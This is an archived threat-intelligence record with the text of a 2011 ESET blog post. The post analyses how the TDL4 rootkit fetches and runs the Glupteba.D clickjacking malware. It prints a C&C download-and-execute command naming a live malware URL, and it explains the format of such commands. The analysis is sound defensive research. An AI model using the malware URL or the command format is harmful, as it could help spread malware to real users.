{
	"id": "5bc3f3ed-c15a-4c60-918a-80a25d7bb759",
	"created_at": "2026-04-06T00:22:14.368242Z",
	"updated_at": "2026-04-10T03:21:45.943868Z",
	"deleted_at": null,
	"sha1_hash": "85d48226e4ee82885e5bf150356524e8d655daa9",
	"title": "TDL4 and Glupteba: Piggyback PiggyBugs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 130830,
	"plain_text": "TDL4 and Glupteba: Piggyback PiggyBugs\r\nBy David Harley\r\nArchived: 2026-04-05 16:12:55 UTC\r\n02 Mar 2011  •  , 1 min. read\r\nMy colleague Aleksandr Matrosov today received an interesting sample of TDL4 from another of my colleagues,\r\nPierre-Marc Bureau: this sample downloads and install another malicious program, Win32/Glupteba.D. This was\r\nthe first instance he’d come across of TDL4 used to install other malware, and here's his account of what he found.\r\nA sample of Win32/Olmarik.AOV was obtained from the URL hxxp://vidquick.info/cgi/icpcom.exe. After what\r\nlooked like a standard TDL4 installation, at any rate in accordance with the most recent  versions analysed,\r\nWin32/Olmarik.AOV received a command from the C\u0026C server to download and execute another binary file.\r\nThe C\u0026C command looks like this:\r\ntask_id = 2|10||http://wheelcars.ru/no.exe [Win32/Glupteba.D]\r\nCommands are formatted like this:\r\ntask_id = \u003ccommand_id\u003e\u003cencryption_key\u003e\u003cURL\u003e\r\nIn this particular case, the command ID coincides with “DownloadAndExecute”, because the encryption key is\r\nnull and the command id is 2 followed by 10.\r\nWin32/Glupteba.D uses blackhat SEO methods for to push clickjacking contextual advertising used by the ads\r\nnetwork Begun (http://www.begun.ru/), which has a high profile in Russia. Clickjacking algorithms have been\r\ndeveloped for crawling web-sites pushing typical content for specified context ads. All affected web-sites are\r\nhosted by a single provider: “Masterhost.ru” is, in fact, the biggest Russian hosting-provider.\r\nNetwork activity from Win32/Glupteba.D is shown in the following screendump:\r\nhttps://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/\r\nPage 1 of 2\n\nCommands for Win32/Glupteba.D to C\u0026C look like this:\r\nThis is not a plugin for TDL4: it’s standalone malware, which can download and execute other binary modules\r\nindependently. Win32/Glupteba.D is not integrated into TDL4 functionality.\r\nDavid Harley, ESET Senior Research Fellow\r\nAleksandr Matrosov, Senior Malware Rsearcher\r\nLet us keep you\r\nup to date\r\nSign up for our newsletters\r\nSource: https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/\r\nhttps://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/"
	],
	"report_names": [
		"tdl4-and-glubteba-piggyback-piggybugs"
	],
	"threat_actors": [],
	"ts_created_at": 1775434934,
	"ts_updated_at": 1775791305,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85d48226e4ee82885e5bf150356524e8d655daa9.pdf",
		"text": "https://archive.orkl.eu/85d48226e4ee82885e5bf150356524e8d655daa9.txt",
		"img": "https://archive.orkl.eu/85d48226e4ee82885e5bf150356524e8d655daa9.jpg"
	}
}